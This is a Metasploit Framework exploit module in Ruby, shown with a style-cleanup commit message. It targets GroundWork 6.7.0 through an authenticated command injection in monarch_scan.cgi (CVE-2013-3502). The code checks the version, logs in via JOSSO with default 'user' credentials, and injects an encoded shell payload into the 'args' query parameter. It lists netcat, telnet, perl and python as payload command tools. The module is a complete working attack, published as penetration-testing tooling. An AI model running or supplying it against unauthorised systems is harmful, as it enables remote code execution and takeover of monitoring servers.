Tod Beardsley
c547e84fa7
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.
This change converts all Payloads to this format if there is more than
one payload to choose from.
It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.
See:
https://github.com/bbatsov/ruby-style-guide#collections
131 lines
4.2 KiB
Ruby
131 lines
4.2 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "GroundWork monarch_scan.cgi OS Command Injection",
|
|
'Description' => %q{
|
|
This module exploits a vulnerability found in GroundWork 6.7.0. This software
|
|
is used for network, application and cloud monitoring. The vulnerability exists in
|
|
the monarch_scan.cgi where user controlled input is used in the perl qx function.
|
|
This allows any remote authenticated attacker, regardless of privileges, to
|
|
inject system commands and gain arbitrary code execution. The module has been tested
|
|
successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04
|
|
based VM appliance.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Johannes Greil', # Vulnerability Discovery, PoC
|
|
'juan vazquez' # Metasploit module
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2013-3502' ],
|
|
[ 'OSVDB', '91051' ],
|
|
[ 'US-CERT-VU', '345260' ],
|
|
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
|
|
],
|
|
'Arch' => ARCH_CMD,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 8190,
|
|
'DisableNops' => true,
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd'
|
|
},
|
|
# Based on the default Ubuntu 10.04 VM appliance
|
|
'RequiredCmd' => 'generic telnet netcat perl python'
|
|
},
|
|
'Platform' => %w{ linux unix },
|
|
'Targets' =>
|
|
[
|
|
['GroundWork 6.7.0', {}]
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => "Mar 8 2013",
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('USERNAME', [true, 'GroundWork Username', 'user']),
|
|
OptString.new('PASSWORD', [true, 'GroundWork Password', 'user'])
|
|
], self.class)
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri("josso", "signon", "login.do")
|
|
})
|
|
|
|
if res and res.body =~ /GroundWork.*6\.7\.0/
|
|
return Exploit::CheckCode::Appears
|
|
elsif res and res.body =~ /GroundWork/
|
|
return Exploit::CheckCode::Detected
|
|
else
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
|
|
def get_josso_token
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri("josso", "signon", "usernamePasswordLogin.do"),
|
|
'vars_post' => {
|
|
'josso_cmd' => 'login',
|
|
'josso_username' => datastore['USERNAME'],
|
|
'josso_password' => datastore['PASSWORD']
|
|
}
|
|
})
|
|
if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/
|
|
return $1
|
|
else
|
|
return nil
|
|
end
|
|
end
|
|
|
|
def execute_command(command)
|
|
http_handler = ((datastore['SSL']) ? "https" : "http")
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri("monarch", "monarch_scan.cgi"),
|
|
'headers' =>
|
|
{
|
|
'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc"
|
|
},
|
|
'cookie' => "JOSSO_SESSIONID=#{@josso_id}",
|
|
'query' => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}"
|
|
})
|
|
return res
|
|
end
|
|
|
|
def exploit
|
|
peer = "#{rhost}:#{rport}"
|
|
|
|
print_status("#{peer} - Attempting to login...")
|
|
@josso_id = get_josso_token
|
|
if @josso_id.nil?
|
|
fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID")
|
|
end
|
|
print_good("#{peer} - Authentication successful")
|
|
|
|
print_status("#{peer} - Sending malicious request...")
|
|
execute_command(payload.encoded)
|
|
end
|
|
end
|